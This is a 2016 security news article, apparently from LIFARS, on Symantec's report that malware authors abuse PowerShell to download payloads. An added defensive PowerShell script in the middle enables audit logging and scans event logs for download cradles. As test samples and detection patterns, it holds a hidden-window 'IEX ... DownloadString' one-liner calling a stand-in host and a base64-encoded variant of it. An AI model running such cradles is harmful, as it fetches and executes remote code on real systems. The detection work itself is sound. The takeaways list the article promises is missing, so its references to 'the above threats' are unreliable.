December 12, 2016

Microsoft’s PowerShell is Being Abused by Malware Authors

Microsoft PowerShell, the software giant's scripting language and shell, which is installed by default on every supported version of Windows, is being used by cybercriminals to spread malware, security researchers have revealed.

Security firm Symantec has revealed that 95.4 percent of the PowerShell scripts it analysed were malicious. That figure describes scripts submitted to Symantec for analysis rather than PowerShell use in general, but the trend is clear: malware authors are increasingly turning to the scripting language and shell platform, using its flexibility to download and launch their payloads, Symantec's researchers confirmed.

PowerShell has been around for over a decade now and is typically used by system administrators for daily management tasks. However, both commodity cybercriminals and well-known targeted-attack groups are leveraging PowerShell too.

Because PowerShell ships with Windows and is trusted by administrators, it makes an attractive platform for malware authors. Most organizations are exposed because they have not enabled the framework's extended logging (script block logging, module logging and transcription), so malicious activity leaves little trace. Moreover, PowerShell scripts can execute payloads directly from memory, leaving no file on disk for antivirus to scan, and they are easily obfuscated. Altogether, it is a favored attack tool for cybercriminals.

Most malicious PowerShell scripts were used as downloaders, a role also commonly filled by Office macros, according to the cybersecurity firm's researchers.
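The two practical responses to the points above, enabling the extended logging most organizations lack and hunting the resulting script block events for download-cradle indicators, as an added PowerShell example that is not part of the LIFARS article or Symantec's report. The registry paths are the Group Policy equivalents for PowerShell 5.x; the transcript directory, the indicator list and the sample script blocks are my own assumptions, and the samples are constructed, not captured malware. Enabling the policies requires an elevated session; the offline hunt at the end does not.

```powershell
# Added example, not from the article. Enable PowerShell audit logging, verify it,
# and scan script block text for download-and-execute cradles.
$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Enable-PowerShellAuditLogging {
    param(
        # Assumed location; in practice use a restricted or write-only share.
        [string]$TranscriptDir = 'C:\PSTranscripts'
    )
    # Script Block Logging: every script block, including de-obfuscated content,
    # is written to Microsoft-Windows-PowerShell/Operational as event 4104.
    New-Item -Path "$PolicyRoot\ScriptBlockLogging" -Force | Out-Null
    Set-ItemProperty -Path "$PolicyRoot\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord

    # Module Logging: pipeline execution details (event 4103) for all modules.
    New-Item -Path "$PolicyRoot\ModuleLogging\ModuleNames" -Force | Out-Null
    Set-ItemProperty -Path "$PolicyRoot\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
    New-ItemProperty -Path "$PolicyRoot\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null

    # Transcription: full input/output of every session, with an invocation header.
    New-Item -Path "$PolicyRoot\Transcription" -Force | Out-Null
    New-Item -Path $TranscriptDir -ItemType Directory -Force | Out-Null
    Set-ItemProperty -Path "$PolicyRoot\Transcription" -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty -Path "$PolicyRoot\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty -Path "$PolicyRoot\Transcription" -Name OutputDirectory -Value $TranscriptDir -Type String
}

function Test-PowerShellAuditLogging {
    # Read-only check of the three policies; each field is $true only when enabled.
    $sbl = (Get-ItemProperty "$PolicyRoot\ScriptBlockLogging" -ErrorAction SilentlyContinue).EnableScriptBlockLogging
    $mod = (Get-ItemProperty "$PolicyRoot\ModuleLogging"      -ErrorAction SilentlyContinue).EnableModuleLogging
    $trn = (Get-ItemProperty "$PolicyRoot\Transcription"      -ErrorAction SilentlyContinue).EnableTranscripting
    [pscustomobject]@{ ScriptBlockLogging = ($sbl -eq 1); ModuleLogging = ($mod -eq 1); Transcription = ($trn -eq 1) }
}

# Assumed indicator list: building blocks of download-and-execute one-liners that
# rarely appear together in legitimate administrative scripts.
$CradlePatterns = @(
    'DownloadString', 'DownloadFile', 'Net\.WebClient', 'Invoke-WebRequest', 'Start-BitsTransfer',
    'Invoke-Expression', '\bIEX\b', 'FromBase64String', '-[Ee][Nn][Cc]\w*\s+[A-Za-z0-9+/=]{40,}',
    '-[Nn]o[Pp]\w*', '-[Ww]indow[Ss]tyle\s+[Hh]idden', 'Bypass'
)

function Find-DownloadCradle {
    param([string[]]$ScriptText)
    foreach ($text in $ScriptText) {
        # -EncodedCommand payloads are base64 of UTF-16LE; decode and scan that too,
        # so encoding alone does not hide the cradle.
        $decoded = ''
        if ($text -match '-[Ee][Nn][Cc]\w*\s+([A-Za-z0-9+/=]{20,})') {
            try { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($matches[1])) } catch { }
        }
        $haystack = $text + "`n" + $decoded
        $hits = @($CradlePatterns | Where-Object { $haystack -match $_ })
        # Requiring two indicators cuts noise from a lone Invoke-WebRequest in an admin script.
        if ($hits.Count -ge 2) {
            [pscustomobject]@{
                Indicators = ($hits -join ', ')
                Decoded    = $decoded
                Snippet    = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

function Get-ScriptBlockEvents {
    param([int]$MaxEvents = 2000)
    # Event 4104: Properties[2] is ScriptBlockText.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object { $_.Properties[2].Value }
}

# Constructed sample script blocks (not real captured malware) so the hunt runs offline.
# The encoded sample decodes to "IEX (New-Object Net.WebClient)".
$Samples = @(
    "powershell -nop -w hidden -c `"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')`"",
    'Get-ChildItem C:\Logs | Where-Object Length -gt 1MB | Remove-Item',
    'powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA'
)
Find-DownloadCradle -ScriptText $Samples | Format-Table -AutoSize
# On a host where logging is enabled, hunt the live event log instead:
# Find-DownloadCradle -ScriptText (Get-ScriptBlockEvents) | Format-Table -AutoSize
```

The first and third samples are flagged (the third only because the encoded command is decoded before matching); the ordinary clean-up pipeline in the second is not. Forward the 4104 events to a central collector, since an attacker with local administrator rights can clear the log on the host.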

The report's most notable takeaways, including the most prevalent malware families using PowerShell, are:

All three of the above threats are distributed through spam emails. Symantec added:

Over the last six months, we blocked an average of 466,028 emails with malicious JavaScript per day, and this trend is growing. Not all malicious JavaScript files use PowerShell to download files, but we have seen a steady increase in the framework’s usage.

As always, users are advised to update to the latest version of PowerShell, which carries the logging features noted above, and to keep their security software up to date with the latest patches. Caution when opening attachments is recommended, especially when presented with scripts or files from an untrusted source.

Image credit: Pixabay.

About the author

LIFARS is a global provider of Digital Forensics and Cyber Resiliency Services. Our experience spans two decades working on high-profile events, often in concert with law enforcement agencies around the world. Our proprietary methodology derives directly and indirectly from our experience working with and for U.S. intelligence agencies, Interpol, Europol, and NATO. We are solely dedicated to cyber resiliency and thus pay close attention to all aspects of our clients' engagement experience while providing a strategic and integrated array of services to minimize risk and disruption while protecting your brand.
